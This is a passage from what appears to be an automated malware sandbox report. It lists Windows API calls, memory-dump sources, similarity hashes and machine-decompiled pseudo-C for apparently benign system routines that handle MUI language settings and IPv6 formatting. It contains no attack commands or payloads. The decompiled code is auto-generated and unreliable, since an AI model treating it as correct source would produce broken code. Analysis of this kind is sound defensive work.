                                                                                                                                                  • Instruction Fuzzy Hash: DD018431A802287BFB20B6949C03FFE766C6B41F50F044119FF04BA1C2EA946A0647E6
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 000882B4, Relevance: 3.1, APIs: 2, Instructions: 53threadwindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
                                                                                                                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  • Opcode ID: d3d8ce23e3f5cd1160dac31dec85604f7d2545a95c6e10b76934c02f1b28ae6e
                                                                                                                                                  • Instruction ID: 639e6f2c701df8bb908a5cccb49ea74c59b2b70886047a3dd91c7d454539457a
                                                                                                                                                  • Opcode Fuzzy Hash: d3d8ce23e3f5cd1160dac31dec85604f7d2545a95c6e10b76934c02f1b28ae6e
                                                                                                                                                  • Instruction Fuzzy Hash: 4E012431A406543AEB11B6685C02FFE7B58BF42B14F09828AFE84AE5C3D694190653E5
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0009A0D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A124
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateInternalProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2186235152-0
                                                                                                                                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                  • Instruction ID: be69a164b90f52cdf138f11d4f4c16ae0c8f1d3ca4b73922774bedb9ce3d57f5
                                                                                                                                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                  • Instruction Fuzzy Hash: 7E01B2B2210108BFCB54DF89DC81EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0009A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F192,0008F192,?,00000000,?,?), ref: 0009A1F0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                  • Instruction ID: 89bb538c540c149beddcab492b13c1476a756bae682638512484373e91ae5804
                                                                                                                                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                  • Instruction Fuzzy Hash: B2E01AB16002086BDB10DF49CC85EE737ADAF89650F018154BE0C57242C930E8108BF5
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0008F687, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6BB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                  • Opcode ID: 1358482e5c5b205aaab76b2eeedfd8621a6f304eaa555c97840b81e38e47df03
                                                                                                                                                  • Instruction ID: 635ef0009fefbb22a9cb6e1db16ccafe664d59015206f64b55e8e35fbc25e58f
                                                                                                                                                  • Opcode Fuzzy Hash: 1358482e5c5b205aaab76b2eeedfd8621a6f304eaa555c97840b81e38e47df03
                                                                                                                                                  • Instruction Fuzzy Hash: CED05B7665020137E610BAA49D03F6631C97B54714F4900E4FD48EB3C7D560D81146A5
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0008F690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6BB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                  • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                                                                                                                  • Instruction ID: 61ef560bb03ba9adce2078f54508012ad0f896a2dd35becffac913c9d2969378
                                                                                                                                                  • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                                                                                                                  • Instruction Fuzzy Hash: A6D0A7727943043BEA10FAA49C03F6632CC7B44B14F490074F948DB3C3E960E4114165
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 00C78788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                  			E00C78788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00C78460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00C5E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00C7718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00C78460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00C7718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00C78460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00C78460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00C78460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00C7718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00C5E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00C52340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00C6E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00C5E2A8(_t322,  &_v68, _v16);
								if(E00C75553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00C6E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00C5E2A8(_t322,  &_v68, _t236);
								if(E00C75553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00C7718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00C5E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00C52340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00C6E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00C5E2A8(_v12,  &_v68, _v16);
							if(E00C75553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00C6E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00C5E2A8(_t322,  &_v68, _t269);
							if(E00C75553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00C7718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00C5E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00C52340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00C6E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00C5E2A8(_v12,  &_v68, _v16);
						if(E00C75553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00C6E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00C5E2A8(_t322,  &_v68, _t296);
						if(E00C75553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                  0x00c78788
                                                                                                                                                  0x00c78788
                                                                                                                                                  0x00c78791
                                                                                                                                                  0x00c78794
                                                                                                                                                  0x00c78798
                                                                                                                                                  0x00c7879b
                                                                                                                                                  0x00c7879e
                                                                                                                                                  0x00c787a1
                                                                                                                                                  0x00c787a4
                                                                                                                                                  0x00c787a7
                                                                                                                                                  0x00c787aa
                                                                                                                                                  0x00c787af
                                                                                                                                                  0x00cc1ad3
                                                                                                                                                  0x00c78b0a
                                                                                                                                                  0x00c78b0d
                                                                                                                                                  0x00c78b13
                                                                                                                                                  0x00c78b19
                                                                                                                                                  0x00c78b1f
                                                                                                                                                  0x00c78b25
                                                                                                                                                  0x00c78b2b
                                                                                                                                                  0x00c78b31
                                                                                                                                                  0x00c78b37
                                                                                                                                                  0x00c78b3d
                                                                                                                                                  0x00c78b46
                                                                                                                                                  0x00c78b46
                                                                                                                                                  0x00c787c6
                                                                                                                                                  0x00c787d0
                                                                                                                                                  0x00cc1ae0
                                                                                                                                                  0x00cc1ae6
                                                                                                                                                  0x00cc1af8
                                                                                                                                                  0x00cc1af8
                                                                                                                                                  0x00cc1afd
                                                                                                                                                  0x00cc1afe
                                                                                                                                                  0x00cc1b01
                                                                                                                                                  0x00cc1b06
                                                                                                                                                  0x00cc1b06
                                                                                                                                                  0x00c787d6
                                                                                                                                                  0x00c787f2
                                                                                                                                                  0x00c787f7
                                                                                                                                                  0x00c78807
                                                                                                                                                  0x00c7880a
                                                                                                                                                  0x00c7880f
                                                                                                                                                  0x00c78810
                                                                                                                                                  0x00c78813
                                                                                                                                                  0x00c78818
                                                                                                                                                  0x00c78818
                                                                                                                                                  0x00c7882c
                                                                                                                                                  0x00c78831
                                                                                                                                                  0x00c78838
                                                                                                                                                  0x00c78908
                                                                                                                                                  0x00c78920
                                                                                                                                                  0x00c789f0
                                                                                                                                                  0x00c78a08
                                                                                                                                                  0x00c78af6
                                                                                                                                                  0x00c78af6
                                                                                                                                                  0x00c78af8
                                                                                                                                                  0x00c78afb
                                                                                                                                                  0x00cc1beb
                                                                                                                                                  0x00cc1beb
                                                                                                                                                  0x00c78b04
                                                                                                                                                  0x00cc1bf8
                                                                                                                                                  0x00cc1c0e
                                                                                                                                                  0x00cc1c13
                                                                                                                                                  0x00cc1c16
                                                                                                                                                  0x00cc1c16
                                                                                                                                                  0x00cc1bf8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c78b04
                                                                                                                                                  0x00c78a0e
                                                                                                                                                  0x00c78a11
                                                                                                                                                  0x00c78a14
                                                                                                                                                  0x00c78a15
                                                                                                                                                  0x00c78a18
                                                                                                                                                  0x00c78a22
                                                                                                                                                  0x00c78b59
                                                                                                                                                  0x00c78a28
                                                                                                                                                  0x00c78a3c
                                                                                                                                                  0x00c78a3c
                                                                                                                                                  0x00c78a42
                                                                                                                                                  0x00cc1bb0
                                                                                                                                                  0x00cc1b11
                                                                                                                                                  0x00cc1b11
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c78a48
                                                                                                                                                  0x00c78a51
                                                                                                                                                  0x00c78a5b
                                                                                                                                                  0x00c78a5e
                                                                                                                                                  0x00c78a61
                                                                                                                                                  0x00c78a69
                                                                                                                                                  0x00c78a69
                                                                                                                                                  0x00c78a6d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c78a74
                                                                                                                                                  0x00c78a7c
                                                                                                                                                  0x00c78a7d
                                                                                                                                                  0x00c78a91
                                                                                                                                                  0x00c78a93
                                                                                                                                                  0x00c78a93
                                                                                                                                                  0x00c78a98
                                                                                                                                                  0x00c78a9b
                                                                                                                                                  0x00c78aa1
                                                                                                                                                  0x00c78aa1
                                                                                                                                                  0x00c78aa4
                                                                                                                                                  0x00c78aaa
                                                                                                                                                  0x00c78ab1
                                                                                                                                                  0x00c78ac5
                                                                                                                                                  0x00c78ac7
                                                                                                                                                  0x00c78ac7
                                                                                                                                                  0x00c78ac5
                                                                                                                                                  0x00c78ace
                                                                                                                                                  0x00cc1bc9
                                                                                                                                                  0x00cc1bce
                                                                                                                                                  0x00cc1bd2
                                                                                                                                                  0x00cc1bd2
                                                                                                                                                  0x00c78ad8
                                                                                                                                                  0x00c78aeb
                                                                                                                                                  0x00c78aeb
                                                                                                                                                  0x00c78af0
                                                                                                                                                  0x00c78af4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c78af4
                                                                                                                                                  0x00c78a42
                                                                                                                                                  0x00c78926
                                                                                                                                                  0x00c78929
                                                                                                                                                  0x00c7892c
                                                                                                                                                  0x00c7892d
                                                                                                                                                  0x00c78930
                                                                                                                                                  0x00c78935
                                                                                                                                                  0x00c7893a
                                                                                                                                                  0x00c78b51
                                                                                                                                                  0x00c78940
                                                                                                                                                  0x00c78954
                                                                                                                                                  0x00c78954
                                                                                                                                                  0x00c7895a
                                                                                                                                                  0x00cc1b63
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c78960
                                                                                                                                                  0x00c78969
                                                                                                                                                  0x00c78973
                                                                                                                                                  0x00c78976
                                                                                                                                                  0x00c78979
                                                                                                                                                  0x00c7897e
                                                                                                                                                  0x00c78981
                                                                                                                                                  0x00c78981
                                                                                                                                                  0x00c78986
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cc1b6e
                                                                                                                                                  0x00cc1b74
                                                                                                                                                  0x00cc1b7b
                                                                                                                                                  0x00cc1b8f
                                                                                                                                                  0x00cc1b91
                                                                                                                                                  0x00cc1b91
                                                                                                                                                  0x00cc1b99
                                                                                                                                                  0x00cc1b9c
                                                                                                                                                  0x00cc1ba2
                                                                                                                                                  0x00cc1ba2
                                                                                                                                                  0x00c7898c
                                                                                                                                                  0x00c78992
                                                                                                                                                  0x00c78999
                                                                                                                                                  0x00c789ad
                                                                                                                                                  0x00cc1ba8
                                                                                                                                                  0x00cc1ba8
                                                                                                                                                  0x00c789ad
                                                                                                                                                  0x00c789b6
                                                                                                                                                  0x00c789c8
                                                                                                                                                  0x00c789cd
                                                                                                                                                  0x00c789d0
                                                                                                                                                  0x00c789d0
                                                                                                                                                  0x00c789d6
                                                                                                                                                  0x00c789e8
                                                                                                                                                  0x00c789e8
                                                                                                                                                  0x00c789ed
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c789ed
                                                                                                                                                  0x00c7895a
                                                                                                                                                  0x00c7883e
                                                                                                                                                  0x00c78841
                                                                                                                                                  0x00c78844
                                                                                                                                                  0x00c78845
                                                                                                                                                  0x00c78848
                                                                                                                                                  0x00c7884d
                                                                                                                                                  0x00c78852
                                                                                                                                                  0x00c78b49
                                                                                                                                                  0x00c78858
                                                                                                                                                  0x00c7886c
                                                                                                                                                  0x00c7886c
                                                                                                                                                  0x00c78872
                                                                                                                                                  0x00cc1b0e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c78878
                                                                                                                                                  0x00c78881
                                                                                                                                                  0x00c7888b
                                                                                                                                                  0x00c7888e
                                                                                                                                                  0x00c78891
                                                                                                                                                  0x00c78896
                                                                                                                                                  0x00c78899
                                                                                                                                                  0x00c78899
                                                                                                                                                  0x00c7889e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cc1b21
                                                                                                                                                  0x00cc1b27
                                                                                                                                                  0x00cc1b2e
                                                                                                                                                  0x00cc1b42
                                                                                                                                                  0x00cc1b44
                                                                                                                                                  0x00cc1b44
                                                                                                                                                  0x00cc1b4c
                                                                                                                                                  0x00cc1b4f
                                                                                                                                                  0x00cc1b55
                                                                                                                                                  0x00cc1b55
                                                                                                                                                  0x00c788a4
                                                                                                                                                  0x00c788aa
                                                                                                                                                  0x00c788b1
                                                                                                                                                  0x00c788c5
                                                                                                                                                  0x00cc1b5b
                                                                                                                                                  0x00cc1b5b
                                                                                                                                                  0x00c788c5
                                                                                                                                                  0x00c788ce
                                                                                                                                                  0x00c788e0
                                                                                                                                                  0x00c788e5
                                                                                                                                                  0x00c788e8
                                                                                                                                                  0x00c788e8
                                                                                                                                                  0x00c788ee
                                                                                                                                                  0x00c78900
                                                                                                                                                  0x00c78900
                                                                                                                                                  0x00c78905
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c78905

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 00C78914
                                                                                                                                                  • Kernel-MUI-Number-Allowed, xrefs: 00C787E6
                                                                                                                                                  • Kernel-MUI-Language-Allowed, xrefs: 00C78827
                                                                                                                                                  • Kernel-MUI-Language-SKU, xrefs: 00C789FC
                                                                                                                                                  • WindowsExcludedProcs, xrefs: 00C787C1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _wcspbrk
                                                                                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                  • API String ID: 402402107-258546922
                                                                                                                                                  • Opcode ID: 0be67161a8e790b81106187c563e4d481cf83bcbe66c615a113f3e4335a1f8b8
                                                                                                                                                  • Instruction ID: 30a26aad032da08177b643aab89378772fcedc698ea7361ba43a547266216c61
                                                                                                                                                  • Opcode Fuzzy Hash: 0be67161a8e790b81106187c563e4d481cf83bcbe66c615a113f3e4335a1f8b8
                                                                                                                                                  • Instruction Fuzzy Hash: 51F1F9B5D00209EFCF11DF95C985DEEB7B9FF08300F14846AEA15A7251DB349A49EB60
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C913CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 38%
                                                                                                                                                  			E00C913CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00C87707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xc52926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00C87707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xc59cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00C87707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00C87707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00C87707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00C87707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                  0x00c913d5
                                                                                                                                                  0x00c913d9
                                                                                                                                                  0x00c913dc
                                                                                                                                                  0x00c913de
                                                                                                                                                  0x00c913e1
                                                                                                                                                  0x00c913e8
                                                                                                                                                  0x00c913ee
                                                                                                                                                  0x00cbe8fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbe921
                                                                                                                                                  0x00cbe921
